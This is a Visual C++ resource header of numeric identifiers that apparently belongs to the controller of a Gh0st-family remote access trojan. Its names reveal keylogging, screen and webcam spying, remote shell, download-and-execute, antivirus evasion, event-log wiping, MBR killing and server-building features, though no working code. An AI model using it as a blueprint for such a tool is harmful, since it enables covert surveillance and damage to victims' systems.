//{{NO_DEPENDENCIES}}
// Microsoft Developer Studio generated include file.
// Used by DHL_yk.rc
//
#define IDM_APP_ABOUT                   65535

#define IDD_ABOUTBOX                    100
#define IDR_MAINFRAME                   128
#define IDR_GH0STTYPE                   129
#define IDD_BUILD                       131
#define IDD_FILE                        132
#define IDR_LIST                        133
#define IDC_DRAG                        134
#define IDC_MUTI_DRAG                   135
#define IDC_CURSOR3                     136
#define IDC_CURSOR4                     137
#define IDD_SETTINGS                    140
#define IDR_FILEMANAGER                 146
#define IDR_TOOLBAR1                    147
#define IDB_TOOLBAR                     149
#define IDB_TOOLBAR_ENABLE              149
#define IDR_TOOLBAR2                    154
#define IDR_LOCAL_VIEW                  156
#define IDR_REMOTE_VIEW                 157
#define IDB_TOOLBAR_DISABLE             158
#define IDD_TRANSFERMODE_DLG            159
#define IDD_SCREENSPY                   160
#define IDD_DOWNEXEC                    162
#define IDD_WEBCAM                      163
#define IDI_WEBCAM                      164
#define IDB_ARROWDOWN                   165
#define IDB_ARROWUP                     166
#define IDD_KEYBOARD                    167
#define IDD_NEWFOLDER                   168
#define IDD_SYSTEM                      169
#define IDR_PSLIST                      170
#define IDD_SHELL                       171
#define IDR_BSS                         173
#define IDI_CMDSHELL                    177
#define IDI_KEYBOARD                    178
#define IDI_SYSTEM                      179
#define IDC_DOT                         182
#define IDR_MINIMIZE                    183
#define IDD_AUDIO                       184
#define IDI_AUDIO                       185
#define IDR_SKIN                        186
#define IDR_MENU_TAB                    191
#define IDD_CHANGE_GROUP                191
#define IDI_EVENT_INFO                  192
#define IDR_LOG                         193
#define IDI_EVENT_ERROR                 193
#define IDI_USER                        194
#define IDI_SHIPIN                      195
#define IDD_SHOW_NUM                    197
#define IDD_BATCH                       198
#define IDD_MORE_CHOOSE                 199
#define IDD_UPDATEIP                    201
#define IDR_TOOLBAR3                    202
#define IDI_STR_ICON                    203
#define IDD_SKIN_COLOUR                 204
#define IDD_SERMANA                     205
#define IDR_SLIST                       206
#define IDI_ICOINFO_SERVICES            207
#define IDD_ADD_USER                    208
#define IDI_ICOINFO_PROCESS             209
#define IDI_ICOINFO_APPWIN              210
#define IDI_ICON_NET                    211
#define IDR_UPX                         212
#define IDR_REGL_MENU                   213
#define IDB_BITMAP1                     213
#define IDD_REG_DIALOG                  214
#define IDD_PLAY                        215
#define IDI_DWORD_ICON                  216
#define IDI_FATHER_ICON                 217
#define IDI_DIR_ICON                    218
#define IDD_DAILI                       219
#define IDD_SYSTEM_SET                  220
#define IDD_SETTING                     221
#define IDB_TOOLBARLARGE                222
#define IDB_BITMAP_XTGL                 223
#define IDR_REGT_MENU                   224
#define IDB_BITMAP2                     226
#define IDB_MENU                        226
#define IDR_SKIN_DIALOG                 227
#define IDR_SKIN1                       228
#define IDR_SKIN2                       229
#define IDR_SKIN3                       230
#define IDI_ICON1                       230
#define IDR_SKIN4                       231
#define IDR_SKIN5                       232
#define IDR_MENU_SCREEN                 232
#define IDD_BUILD_SERVER                233
#define IDR_SKIN6                       233
#define IDI_SCREESPY                    234
#define IDD_PROXY                       238
#define IDD_SER_ATTRIB_DLG              239
#define IDR_251                         239
#define IDC_COMBO1                      240
#define IDC_SHOWNAME                    241
#define IDC_MIAOSHU                     242
#define IDD_LOGIN                       242
#define IDR_SERT_YJ                     245
#define IDI_ICON2                       248
#define IDI_SUERES_T                    249
#define IDD_STARTUP_DIALOG              251
#define IDI_SUER_1                      252
#define IDI_SUER_2                      253
#define IDD_MSGBOX                      254
#define IDB_Logo                        255
#define IDI_SYSKM                       256
#define IDI_DIR_ICON2                   258
#define IDI_BE_CAREFUL                  264
#define IDI_SYSTRAY1                    266
#define IDR_SMALLICONS                  309
#define IDR_LARGEICONS                  310
#define IDB_GEAR                        312
#define ID_GROUP_EDITING                313
#define ID_GROUP_CLIPBOARD              314
#define IDR_MENU_OPTIONS                316
#define IDD_REGDATA_DLG                 317
#define IDC_PATH                        318
#define IDC_KEY                         319
#define IDI_REG_ICON                    320
#define IDR_LAYOUT                      322
#define ID_INDICATOR_MACRORECORDING     324
#define IDR_WAVE1                       325
#define IDR_WAVE2                       326
#define IDR_WAVE3                       327
#define IDC_APPLY                       328
#define IDI_ICON_TOOL                   329
#define IDI_ICON_MD5                    330
#define IDM_TOOLS                       331
#define IDD_TOOLS_DIALOG                332
#define IDC_LIST2                       333
#define IDC_EDIT_PATH                   334
#define IDC_EDIT_TIME1                  335
#define IDC_SELECTICON                  336
#define IDC_BUTTON_SAVEAS               337
#define IDC_BUTTON3                     338
#define IDC_SELECTFILE                  339
#define IDC_START                       340
#define IDC_STOP                        341
#define IDC_BUTTON4                     342
#define IDC_CHECK3                      343
#define IDC_FILE_PATH                   344
#define IDC_BUTTON5                     345
#define IDC_EDIT5                       346
#define IDC_ICONS                       347
#define IDC_EDIT2                       348
#define IDC_OMD3                        349
#define IDC_CMD5                        350
#define IDC_STATIC_COUNT                351
#define IDC_EDIT4                       352
#define IDC_LIST_REMOTE                 1005
#define IDC_LIST_LOCAL                  1006
#define IDC_LOCAL_PATH                  1007
#define IDC_REMOTE_PATH                 1008
#define IDC_STATIC_REMOTE               1009
#define IDC_CONFIRM                     1010
#define IDC_PORT                        1011
#define IDC_LISTEN_PORT                 1011
#define IDC_S_PORT                      1011
#define IDC_OVERWRITE                   1012
#define IDC_CONNECT_MAX                 1012
#define IDC_ADDITION                    1013
#define IDC_JUMP                        1014
#define IDC_OVERWRITE_ALL               1015
#define IDC_ADDITION_ALL                1016
#define IDC_JUMP_ALL                    1017
#define IDC_CANCEL                      1018
#define IDC_TIPS                        1019
#define IDC_URL                         1021
#define IDC_ENCODE                      1022
#define IDC_DNS_STRING                  1022
#define IDC_REMOTE_HOST                 1023
#define IDC_REMOTE_HOST1                1023
#define IDC_REMOTE_PORT                 1024
#define IDC_REMOTE_PORT1                1024
#define IDC_PROXY_HOST                  1025
#define IDC_REMOTE_PORT2                1025
#define IDC_PROXY_PORT                  1026
#define IDC_REMOTE_HOST2                1026
#define IDC_PROXY_USER                  1027
#define IDC_REMOTE_PORT3                1027
#define IDC_PROXY_PASS                  1028
#define IDC_REMOTE_HOST3                1028
#define IDC_EDIT                        1029
#define IDC_RESETPORT                   1030
#define IDC_FOLDERNAME                  1031
#define IDC_CHANGE_PASS                 1031
#define IDC_LIST_PROCESS                1034
#define IDC_TAB                         1035
#define IDC_SLIDER2                     1035
#define IDC_LIST_WINDOWS                1036
#define IDC_SLIDER3                     1036
#define IDC_LIST_DIALUPASS              1037
#define IDC_SLIDER4                     1037
#define IDC_BUILD                       1038
#define IDC_SLIDER5                     1038
#define IDC_LIST_SERVER                 1038
#define IDC_SLIDER6                     1039
#define IDC_CONNECT_AUTO                1040
#define IDC_SLIDER7                     1040
#define IDC_STATIC_VER                  1041
#define IDC_SLIDER8                     1041
#define IDC_SLIDER9                     1042
#define IDC_ENABLE_HTTP                 1043
#define IDC_SLIDER10                    1043
#define IDC_CHECK_AUTH                  1048
#define IDC_CHECK_PROXY                 1049
#define IDC_TEST_PROXY                  1050
#define IDC_TEST_MASTER                 1051
#define IDC_TEST_MASTER1                1051
#define IDC_SYSTEM_TIPS                 1052
#define IDC_TEST_MASTER2                1052
#define IDC_DISABLE_POPTIPS             1053
#define IDC_TEST_MASTER3                1053
#define IDC_SEND_LOCALAUDIO             1054
#define IDC_SAVEAS_DEFAULT              1054
#define IDC_SERVICE_DISPLAYNAME         1058
#define IDC_SLIDER1                     1058
#define IDC_SERVICE_DESCRIPTION         1059
#define IDC_SLIDER11                    1059
#define IDC_TRTURNMAIN                  1060
#define IDC_TRTURNMAIN2                 1061
#define IDC_TRTURNEXT                   1062
#define IDC_TRTURNEXT2                  1062
#define IDC_BUTTON1                     1063
#define IDC_EXIT_PROXY                  1063
#define IDC_CREATE_GUID                 1063
#define IDC_FIND                        1063
#define IDC_BTN_DNSUPDATE               1063
#define IDC_MSG                         1063
#define IDC_ZHUOMIAN1                   1063
#define IDC_PORTSET                     1063
#define IDC_RANDOM                      1063
#define IDC_NET_ADDS                    1063
#define IDC_FTP_Prese                   1063
#define IDC_BTN_FTPUPDATE               1064
#define IDC_ZHUOMIAN2                   1064
#define IDC_FTP_Filecopy                1064
#define IDC_RENWULAN                    1065
#define IDC_LONGNECT                    1065
#define IDC_PASS                        1066
#define IDC_INSTALL_PATH                1066
#define IDC_RENWULAN2                   1066
#define IDC_FTP_IP                      1066
#define IDC_XIANSHIQI                   1067
#define IDC_SERVICE_NAME                1068
#define IDC_XIANSHIQI2                  1068
#define IDC_PROGRESS1                   1069
#define IDC_SEND_PROGRESS               1069
#define IDC_ZAOYIN                      1069
#define IDC_SHANPING                    1070
#define IDC_GUID                        1071
#define IDC_RADIO_SERVICE               1072
#define IDC_GUANGQU                     1072
#define IDC_RADIO_ACTIVEX               1073
#define IDC_GUANGQU2                    1073
#define IDC_COMBO_INJECT                1074
#define IDC_YINGPAN                     1074
#define IDC_CHECK_DELETE                1075
#define IDC_SET_SKIN                    1075
#define IDC_MOUSE                       1075
#define IDC_MOUSE2                      1076
#define IDC_UPX                         1076
#define IDC_EDIT_user                   1077
#define IDC_EDIT_DNSUSER                1077
#define IDC_EDIT_MSG                    1077
#define IDC_RENWU                       1077
#define IDC_GDTJ                        1077
#define IDC_EDIT_admin                  1078
#define IDC_EDIT_DNSPASS                1078
#define IDC_SHUTDOWN                    1078
#define IDC_MEUX                        1078
#define IDC_COMBO_GROUP                 1079
#define IDC_EDIT_pass                   1079
#define IDC_EDIT_DNSDOMAIN              1079
#define IDC_LOGOFF                      1079
#define IDC_WIN_NT                      1080
#define IDC_EDIT_FTPUSER                1080
#define IDC_REBOOT                      1080
#define IDC_EDIT_admin2                 1080
#define IDC_LONGRANGE_Port1             1080
#define IDC_EDIT_DNSUSER1               1080
#define IDC_COMBO_DNSIP                 1081
#define IDC_REMOVE                      1081
#define IDC_VERSION                     1082
#define IDC_WIN_XP                      1082
#define IDC_EDIT_FTPPASS                1082
#define IDC_OPEN_ADDRESS                1082
#define IDC_INFO                        1082
#define IDC_EDIT_DNSPASS1               1082
#define IDC_ONLINE_PASS                 1083
#define IDC_WIN_VISTA                   1083
#define IDC_EDIT_FTPIP                  1083
#define IDC_DOWN_ADDRESS                1083
#define IDC_OPEN_MEG                    1083
#define IDC_EDIT_DNSDOMAIN1             1083
#define IDC_WIN_7                       1084
#define IDC_SelectAll                   1084
#define IDC_COMBO_DNSIP1                1084
#define IDC_WIN_2000                    1085
#define IDC_FTPURL                      1085
#define IDC_OPEN_KIND                   1085
#define IDC_WIN_2003                    1086
#define IDC_DO                          1086
#define IDC_UnSelectAll                 1086
#define IDC_ANTIYUN                     1087
#define IDC_WIN_2008                    1087
#define IDC_OPEN                        1087
#define IDC_PORT_SEND                   1087
#define IDC_ANTI360                     1088
#define IDC_DOWN                        1088
#define IDC_EDIT1                       1088
#define IDC_BUTTON2                     1089
#define IDC_PORT_SET                    1089
#define IDC_FTP_NEMA                    1089
#define IDC_CHECK_XP                    1090
#define IDC_S_USE                       1090
#define IDC_LONGIP                      1090
#define IDC_FTPServer                   1090
#define IDC_CHECK_NT                    1091
#define IDC_S_NAME                      1091
#define IDC_LONGNEMA                    1091
#define IDC_CHECK_VISTA                 1092
#define IDC_S_PASS                      1092
#define IDC_LONGPASS                    1092
#define IDC_CHECK_2000                  1093
#define IDC_LONGPORT                    1093
#define IDC_CHECK_2003                  1094
#define IDC_CHECK_WIN7                  1095
#define IDC_CHECK_2008                  1096
#define IDC_COMBO_CAM                   1097
#define IDC_COMBO_WINDOW                1098
#define IDC_NOALL                       1098
#define IDC_SET                         1099
#define IDC_COMBO_PROSS                 1099
#define IDC_IFONLINE                    1100
#define IDC_COMBO_ADDRESS               1100
#define IDC_IFOFFLINE                   1101
#define IDC_IFSUCCESS                   1102
#define IDC_CHECK_ALL                   1102
#define IDC_USEORNOT                    1103
#define IDC_EDIT_NUM                    1103
#define IDC_ZRAZ                        1103
#define IDC_CHECK_NUM                   1104
#define IDC_DELRTD                      1104
#define IDC_DEFAULT                     1105
#define IDC_COMBO_MOVE_NAME             1105
#define IDC_S_3389                      1105
#define IDC_AZZD                        1105
#define IDC_ONLINE                      1106
#define IDC_S_PORTSEND                  1106
#define IDC_ZKFSMS                      1106
#define IDC_OFFLINE                     1107
#define IDC_NET_NAME                    1107
#define IDC_KS_3389                     1107
#define IDC_ZKFKZJ                      1107
#define IDC_NET_PASS                    1108
#define IDC_NET_GROUP                   1109
#define IDC_LJ_3389                     1109
#define IDC_EXIT                        1110
#define IDC_NET_ADD                     1110
#define IDC_NET_ADD2                    1111
#define IDC_LONGRANGE_PortMod           1111
#define IDC_SHIFTOSK                    1112
#define IDC_Server_yjx                  1115
#define IDC_LINE                        1116
#define IDC_SPLASH                      1117
#define IDC_Server_yhx                  1117
#define IDC_SHOW_XX                     1118
#define IDC_Server_tab                  1118
#define IDC_LONGRANGE_Port0             1119
#define IDC_DLL_NAME                    1121
#define IDC_EXE_MEUX                    1122
#define IDC_ICO                         1124
#define IDC_STATIC_ICON                 1125
#define IDC_Exemeux                     1126
#define IDC_SOCKS5                      1127
#define IDC_FTP_SERVER                  1127
#define IDC_TREE                        1128
#define IDC_FTP_SET                     1128
#define IDC_LIST                        1129
#define IDC_COMBO_RELEASEPATH           1130
#define IDC_RADIO1                      1131
#define IDC_RADIO2                      1132
#define IDC_RADIO3                      1133
#define IDC_RADIO4                      1134
#define IDC_RADIO12                     1135
#define IDC_RADIO10                     1136
#define IDC_RADIO13                     1137
#define IDC_RADIO7                      1138
#define IDC_RADIO11                     1139
#define IDC_RADIO5                      1140
#define IDC_RADIO8                      1141
#define IDC_STATIC_ICON1                1142
#define IDC_STATIC_ICON2                1143
#define IDC_STATIC_ICON3                1144
#define IDC_STATIC_ICON4                1145
#define IDC_BUTTON                      1146
#define IDC_TEXT                        1147
#define IDC_STATIC_ONLINE               1148
#define IDC_EDIT_TITLE                  1149
#define IDC_EDIT_TEXT                   1150
#define IDC_SHOW                        1151
#define IDC_SEND                        1152
#define IDC_HORNDATACURVE               1153
#define IDC_MICDATACURVE                1154
#define ID_LOCAL_TOOLBAR                0x5001
#define ID_REMOTE_TOOLBAR               0x5002
#define ID_APP_PWD                      32771
#define IDM_FILEMANAGER                 32772
#define IDM_SHUTDOWN                    32773
#define IDM_REBOOT                      32774
#define IDM_TRANSFER                    32775
#define IDM_RENAME                      32776
#define IDM_DELETE                      32777
#define IDM_NEWFOLDER                   32778
#define IDM_PROPERTY                    32779
#define IDT_LOCAL_PREV                  32780
#define IDT_LOCAL_COPY                  32781
#define IDT_LOCAL_DELETE                32782
#define IDT_LOCAL_VIEW                  32783
#define ID_MENU_DEL                     32783
#define IDT_LOCAL_NEWFOLDER             32784
#define ID_MENU_CREATE                  32784
#define IDM_QTGONNEI                    32785
#define ID_MENU_REF                     32786
#define ID_MENU_START                   32787
#define ID_MENU_STOP                    32788
#define IDT_REMOTE_PREV                 32790
#define IDT_REMOTE_COPY                 32791
#define IDT_REMOTE_DELETE               32792
#define ID_MENU_START_AUTO              32792
#define IDT_REMOTE_NEWFOLDER            32793
#define ID_MENU_START_MANAGER           32793
#define IDT_REMOTE_VIEW                 32794
#define ID_MENU_START_DISABLE           32794
#define IDT_REMOTE_STOP                 32795
#define IDT_LOCAL_STOP                  32797
#define IDM_LOCAL_BIGICON               32798
#define IDM_LOCAL_SMALLICON             32799
#define IDM_LOCAL_LIST                  32800
#define IDM_LOCAL_REPORT                32801
#define IDM_REMOTE_BIGICON              32802
#define IDM_REMOTE_SMALLICON            32803
#define IDM_REMOTE_LIST                 32804
#define IDM_REMOTE_REPORT               32805
#define IDM_SCREENSPY                   32806
#define IDM_DOWNEXEC                    32807
#define IDM_WEBCAM                      32808
#define IDM_REMOVE                      32809
#define IDS_SEREST_PD                   32809
#define IDM_KEYBOARD                    32810
#define IDM_REFRESH                     32811
#define IDM_SYSTEM                      32812
#define IDM_KILLPROCESS                 32813
#define IDM_REFRESHPSLIST               32814
#define IDM_REMOTESHELL                 32815
#define IDM_LOGOFF                      32818
#define IDM_SELECT_ALL                  32820
#define IDM_UNSELECT_ALL                32821
#define IDM_OPEN_URL_SHOW               32825
#define IDM_OPEN_URL_HIDE               32827
#define IDM_CLEANEVENT                  32828
#define IDM_HIDE                        32829
#define IDM_SHOW                        32830
#define IDM_EXIT                        32831
#define IDM_RENAME_REMARK               32832
#define IDM_UPDATE_SERVER               32833
#define IDM_LOCAL_OPEN                  32834
#define IDM_REMOTE_OPEN_SHOW            32836
#define IDM_REMOTE_OPEN_HIDE            32837
#define IDM_AUDIO_LISTEN                32838
#define IDM_DISCONNECT                  32840
#define IDM_SETTINGS                    32841
#define IDM_BUILD                       32842
#define IDM_ADD_GROUP                   32844
#define IDM_CHANGE_GTOUP                32845
#define IDM_EVENT_DELETE                32845
#define IDM_DEl_GROUP                   32846
#define IDM_ALL_DELETE                  32846
#define IDM_CHANGE_GROUP                32847
#define IDM_EVENT_SAVE                  32847
#define IDM_EVENT_COPY                  32848
#define IDM_IPLIST                      32848
#define IDM_IP                          32849
#define IDM_BEIZHU                      32850
#define IDM_DILIXINXI                   32851
#define IDM_ALL                         32852
#define IDM_SHOW_MSG                    32853
#define IDM_OPEN_PORT                   32854
#define IDM_PROXY                       32855
#define IDM_PORT_MAPSET                 32856
#define IDM_PORT_MAPPING                32857
#define IDM_ADD_USER                    32858
#define IDM_KILLMBR                     32859
#define IDM_SKIN_COLOUR                 32860
#define ID_OPTIONS_STYLEBLUE            32875
#define ID_OPTIONS_STYLEBLACK           32876
#define ID_OPTIONS_STYLESILVER          32877
#define ID_OPTIONS_STYLEAQUA            32878
#define ID_OPTIONS_FRAMETHEME           32886
#define ID_OPTIONS_STYLESCENIC          32887
#define ID_OPTIONS_STYLEWHITE           32888
#define IDM_SERMANAGER                  32890
#define IDM_ABOUT                       32891
#define IDM_CLEAN_ALL                   32906
#define IDM_REGEDIT                     32907
#define IDM_REGT_DEL                    32908
#define IDM_REGT_CREAT                  32909
#define IDM_REGL_EDIT                   32910
#define IDM_REGL_DELKEY                 32911
#define IDM_REGL_STR                    32912
#define IDM_REGL_DWORD                  32913
#define IDM_REGL_EXSTR                  32914
#define IDM_START_HIDE                  32921
#define IDM_UPDATA                      32922
#define IDM_NO_START                    32923
#define IDM_START_NORMAL                32924
#define ID_gehang                       32926
#define ID_chayi                        32927
#define ID_close                        32928
#define ID_kongzhi                      32929
#define ID_fasong                       32930
#define ID_genzong                      32931
#define ID_suoding                      32932
#define ID_heiping                      32933
#define ID_buzhuo                       32934
#define ID_kuaizhao                     32935
#define ID_jianqieHQ                    32936
#define ID_jianqieSZ                    32937
#define ID_1wei                         32938
#define ID_4weihui                      32939
#define ID_4weicai                      32940
#define ID_8weihui                      32941
#define ID_8weicai                      32942
#define ID_16wei                        32943
#define ID_32wei                        32944
#define IDD_ADD_SERVER                  32945
#define ID_SER_qy                       32946
#define ID_SER_jy                       32947
#define ID_SER_sc                       32948
#define ID_SER_sx                       32949
#define ID_SER_Cipher                   32950
#define IDM_ADD_SERVER                  32951
#define IDC_AQGL_RZ                     32952
#define IDC_AQGL_YP                     32953
#define IDM_SHOWMSG                     32954
#define IDM_NEWSTIPS                    32955
#define IDM_VOICEPROMPT                 32956
#define ID_STAUTSTIP                    59394
#define ID_STAUTSSPEED                  59395
#define ID_STAUTSPORT                   59396
#define ID_STAUTSCOUNT                  59397

// Next default values for new objects
// 
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_3D_CONTROLS                     1
#define _APS_NEXT_RESOURCE_VALUE        268
#define _APS_NEXT_COMMAND_VALUE         32957
#define _APS_NEXT_CONTROL_VALUE         1131
#define _APS_NEXT_SYMED_VALUE           101
#endif
#endif
